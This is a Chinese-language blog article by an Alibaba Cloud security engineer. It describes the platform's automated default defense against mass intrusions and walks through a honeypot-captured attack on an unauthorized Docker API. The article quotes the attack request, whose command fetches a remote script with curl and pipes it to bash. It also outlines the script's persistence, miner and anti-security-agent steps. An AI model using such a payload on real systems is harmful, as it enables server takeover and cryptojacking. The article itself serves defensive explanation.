逃离泄露事件,阿里云安全默认防御大揭秘 | 问底中国 IT 技术演进

a0b19d3bc9ac373075b2342fd555f6c4.gif

fa7da961aa1e44469db7d6369078f2ab.jpeg

作者 | 黄晓堃 阿里云安全工程师

致谢 | 吴凡 阿里云高级安全工程师,

郭伟博 阿里云高级安全工程师

责编 | 屠敏

随着越来越多企业上云,我们深刻体会到企业云化带来的发展变革,云原生安全带来的价值也逐渐明朗起来。阿里云作为覆盖全国40%网站的平台,每天承担着保障云平台安全的责任,同时将这些原生能力以产品和服务的方式赋能给企业。阿里云有一支默认防御团队,将“默认安全”进行到底,意味着我们将安全基因植入在云平台上,让云上更安全。阿里云安全提供的丰富安全产品和服务让客户和云平台共建,提升整体企业安全水位。

阿里云安全默认防御团队双11当日自动识别并拦截来自184个国家发起的60亿次攻击,成功保障云上租户业务平稳运行。那么云上用户到底经历了些什么?攻击者又有哪些千变万化的手段?默认防御团队又是怎么精准识别进行拦截的?下面通过一个例子让我们一一为大家揭晓。

58db40d30723780f4b9cb70c8272d057.png

激烈的攻防对抗

双11前夜,阿里云安全默认防御团队在云上部署的蜜罐捕获到了这样一条攻击报文。攻击者尝试使用Docker未授权访问远程命令执行漏洞来进行攻击,可以从报文中看到,攻击者使用iplogger记录受害者的ip地址,同时向ix.io请求脚本并执行。 

POST /v1.24/containers/create HTTP/1.1
User-Agent: Go-http-client/1.1

{"Hostname"......"Cmd":["chroot","/mnt","/bin/sh","-c","curl -4 -s https://iplogger.org/xxxxxx;curl -s -L http://ix.io/xxxx | bash;"],"Image":"alpine".......

跟进这个脚本内容可以发现,其中一部分命令是用来关闭阿里云的相关服务以及卸载阿里云主机端安全产品安骑士的动作,目的性非常明显,就是为了规避阿里云安全的检测。除此之外,此脚本会向ssh中写入公钥以便后续免密登陆、写入定时任务持续攻击、关闭常见服务释放资源、下载挖矿软件进行牟利、修改DNS解析防止二次入侵等行为。一旦攻击成功,服务器除了正常业务受到严重影响,甚至所有权也会移向他人之手。默认防御自动侦测到相关批量攻击手段和攻击团伙,在首次攻击发生时便已成功拦截,保障用户正常业务平稳度过双11。

a9cf0d7a843f78016631b430edc89217.png

7452184d8abc323d860edb5093555be4.png

深入洞察攻击行为

在我们进行日常阿里云平台安全保障过程中也发现,攻击者所使用的攻击方式越发层出不穷,变化多端。随着对抗技术手段的不断升级,黑客行为、黑灰产活动也呈现愈发组织化、专业化。

攻击链路

下图展示的是恶意团伙典型的整个攻击流程,大部分攻击者会选择通用安全漏洞(例如,Windows永恒之蓝漏洞等)或者云上使用较多的组件漏洞(例如Redis未授权访问、Struts2远程命令执行等)以及暴力破解服务账号口令的方式进行攻击,从而批量获取云主机权限执行恶意指令。这些恶意指令一般是从攻击团伙所属的服务器下载恶意脚本或可执行文件,然后运行。恶意脚本一般包含三部分功能:通信维持C&C模块(用于后续DDoS、脚本更新或其他指令)、挖矿模块、蠕虫扫描模块(对外扫描,扩大传染范围)。

2433cd2277adcbbd4f268e9749d446c3.png

一切黑灰产和犯罪团伙的攻击都是带有目的性的,而主要目的就是为了牟利。由于门罗币具备独有的匿名货币属性且对CPU架构有优化,极其适用于云上主机场景,因此成为了犯罪团伙挖矿牟利的首选。

由于攻击者的收益与受到感染的主机数量直接相关,为了扩大战果,恶意脚本、恶意木马的投放更加趋向于蠕虫化。蠕虫化的攻击方式使得恶意程序的传播能力大幅增强,甚至企业整个内网都可能都沦为挖矿机器,严重影响正常业务进行。

相互竞争

与正常业务竞争一样,黑灰产之间、恶意团伙之间也存在着相互竞争的关系。一台受漏洞影响的云主机被恶意团伙攻击成功后,存在着被另一批攻击者再次攻击的可能。后者的行为很有可能阻断前者的财路,因此黑灰产、恶意团伙之间的竞争也会在其所使用的恶意程序中展现的淋漓尽致。一台沦陷了的云主机往往遭受过多个恶意团伙轮番"摧残",这也导致恢复起来更加困难,损失更大。 

最常见抑制其他攻击者的手段便是采用脚本杀死包含特定可疑关键字的进程,从而保证"为己所用"。又或是一些攻击团伙攻击成功后,会修复自身所利用的漏洞以防止其他攻击者使用。除此之外,Sinkhole技术也被蠕虫用于对抗同一宿主机上的其他蠕虫。其原理非常简单:修改/etc/hosts文件,将"竞争对手"使用的服务器地址,指向127.0.0.1或0.0.0.0。这样当其他蠕虫尝试从服务器拉取文件,或尝试发送上线信息时,请求将会被重定向到本机而无法正常发送,从而一劳永逸的遏制竞争对手。

1fb5873565c1434c2e6d6b951dfd3e40.png

打造无感化默认防御机制

凭借与黑灰产和恶意团伙多年的对抗经验和技术沉淀,阿里云安全默认防御团队打造了一套完整的入侵攻击行为智能拦截机制,来实现云上租户的无感化默认防御。该机制是为了抵御云上出现的大规模入侵行为,为云上用户提供免费的基础安全防御能力,是阿里云云盾的基础安全防御模块。下图展示的是整个机制的结构示意图。整体结构分为了三部分,威胁感知模块、关联分析模块与拦截处罚模块。

3117421f3a98636e54b2eba9d66a1ddb.png

威胁感知模块

此模块能够通过多种检测途径、在攻击全链路上进行威胁感知。团伙识别单元用于对云上恶意团伙进行分析识别与持续跟进并关注团伙攻击方式是否变化,进而及时响应;入侵行为检测单元主要针对入侵行为产生的异常噪声进行捕获,从而及时发现可疑的入侵行为;而异常监控单元所收集的异常告警数据,一般作为辅助信息与其他数据一起进行分析。

团伙识别

团伙识别对于整个链路的攻击发现与跟进攻击手段升级有着重要的战略意义。下图展示的是整个团伙分析的流程结构图。分析单元根据全链路监控的告警数据,结合威胁情报、Shodan等空间设备搜索引擎数据所提供的IOCs(Indicators ofCompromise),通过网络行为关联、进程行为模式识别,抽取关联实体,以图模型为基础,构建一张超大规模点边组成的完整恶意程序行为网络。之后利用社区发现等图聚类算法通过对整个行为网络的数据进行深度挖掘:剥离归并相同行为特征的簇群为同一团伙,持续追踪并关注其扩张状态或手法更新;监控进程状态,及时清查挖矿进程运行;实时监控中控通信,防止团伙利用僵尸网络进行大规模DDoS攻击。

904666b0c8c6d9462ebe345856752037.png

关联分析模块

关联分析模块是整个机制的处理核心,其主要功能是通过多个维度综合判断恶意行为是否为真正的入侵行为,进而决定放行、拦截或进一步动作。由于单点判断容易引起很高的误报,所以一般会使用多个层面的结果进行关联分析,得到最终的判断。

威胁情报单元主要是通过关联情报数据来对攻击链路的各个指标进行信息补充,例如恶意IP、恶意域名、文件哈希值等;历史行为单元主要用于关联恶意攻击历史行为数据,尝试对类似的行为进行归类合并;指纹提取分析单元针对攻击类型、攻击方式提取相应攻击指纹,用以识别、标记攻击的手段,同时用以入侵原因的综合分析;恶意行为分析单元借助AI手段通过多种模型对攻击手法与告警数据进行智能分析,综合对整体行为进行黑白性质判定;信誉模型单元主要针对攻击者、攻击手段、威胁程度进行画像评估,返回不同威胁等级的评判结果;除此之外,还有各种专用、通用的检测模型对数据进行综合分析挖掘,从而对整个攻击行为进行定性。

拦截处罚模块

当关联分析模块确认攻击行为之后,相关的数据信息便会发送到拦截处罚模块进行攻击拦截,保证云上正常用户业务不受攻击影响。拦截模块的智能决策中心会对需要拦截的攻击者、目标做综合分析,设置合适的拦截机制。同时,为了防止特殊情况造成的影响,智能决策中心会根据具体情况适当延迟处罚时间,观察后续动作。监控告警平台负责关注机制所有的流程的正常运转,发现重大事件时,可以第一时间进行通知,进行人工干预。

43eb253af64b5d5002f4d2ca6a0b8b18.png

结束语

在这套默认防御机制的保护下,今年双11期间,阿里云平台为用户自动识别并拦截了来自184个国家的60亿次攻击。安全防御永远不可能一劳永逸,让安全问题离用户越来越远是我们一直努力的目标。阿里云愿与云上用户一起,共同协作,保障云上安全。

更多「问底中国IT技术演进」专题精彩文章:

d1618fa7677a67a97d83c277ba650ac4.png

你点的每个“在看”,我都认真当成了喜欢

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Quartz是OpenSymphony开源组织在Job scheduling领域又一个开源项目,它可以与J2EE与J2SE应用程序相结合也可以单独使用。Quartz可以用来创建简单或为运行十个,百个,甚至是好几万个Jobs这样复杂的程序。Jobs可以做成标准的Java组件或 EJBs。 Quartz的优势: 1、Quartz是一个任务调度框架(库),它几乎可以集成到任何应用系统中。 2、Quartz是非常灵活的,它让您能够以最“自然”的方式来编写您的项目的代码,实现您所期望的行为 3、Quartz是非常轻量级的,只需要非常少的配置 —— 它实际上可以被跳出框架来使用,如果你的需求是一些相对基本的简单的需求的话。 4、Quartz具有容错机制,并且可以在重启服务的时候持久化(”记忆”)你的定时任务,你的任务也不会丢失。 5、可以通过Quartz,封装成自己的分布式任务调度,实现强大的功能,成为自己的产品。6、有很多的互联网公司也都在使用Quartz。比如美团 Spring是一个很优秀的框架,它无缝的集成了Quartz,简单方便的让企业级应用更好的使用Quartz进行任务的调度。   课程说明:在我们的日常开发中,各种大型系统的开发少不了任务调度,简单的单机任务调度已经满足不了我们的系统需求,复杂的任务会让程序猿头疼, 所以急需一套专门的框架帮助我们去管理定时任务,并且可以在多台机器去执行我们的任务,还要可以管理我们的分布式定时任务。本课程从Quartz框架讲起,由浅到深,从使用到结构分析,再到源码分析,深入解析Quartz、Spring+Quartz,并且会讲解相关原理, 让大家充分的理解这个框架和框架的设计思想。由于互联网的复杂性,为了满足我们特定的需求,需要对Spring+Quartz进行二次开发,整个二次开发过程都会进行讲解。Spring被用在了越来越多的项目中, Quartz也被公认为是比较好用的定时器设置工具,学完这个课程后,不仅仅可以熟练掌握分布式定时任务,还可以深入理解大型框架的设计思想。
[入门数据分析的第一堂课]这是一门为数据分析小白量身打造的课程,你从网络或者公众号收集到很多关于数据分析的知识,但是它们零散不成体系,所以第一堂课首要目标是为你介绍:Ø  什么是数据分析-知其然才知其所以然Ø  为什么要学数据分析-有目标才有动力Ø  数据分析的学习路线-有方向走得更快Ø  数据分析的模型-分析之道,快速形成分析思路Ø  应用案例及场景-分析之术,掌握分析方法[哪些同学适合学习这门课程]想要转行做数据分析师的,零基础亦可工作中需要数据分析技能的,例如运营、产品等对数据分析感兴趣,想要更多了解的[你的收获]n  会为你介绍数据分析的基本情况,为你展现数据分析的全貌。让你清楚知道自己该如何在数据分析地图上行走n  会为你介绍数据分析的分析方法和模型。这部分是讲数据分析的道,只有学会底层逻辑,能够在面对问题时有自己的想法,才能够下一步采取行动n  会为你介绍数据分析的数据处理和常用分析方法。这篇是讲数据分析的术,先有道,后而用术来实现你的想法,得出最终的结论。n  会为你介绍数据分析的应用。学到这里,你对数据分析已经有了初步的认识,并通过一些案例为你展现真实的应用。[专享增值服务]1:一对一答疑         关于课程问题可以通过微信直接询问老师,获得老师的一对一答疑2:转行问题解答         在转行的过程中的相关问题都可以询问老师,可获得一对一咨询机会3:打包资料分享         15本数据分析相关的电子书,一次获得终身学习

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值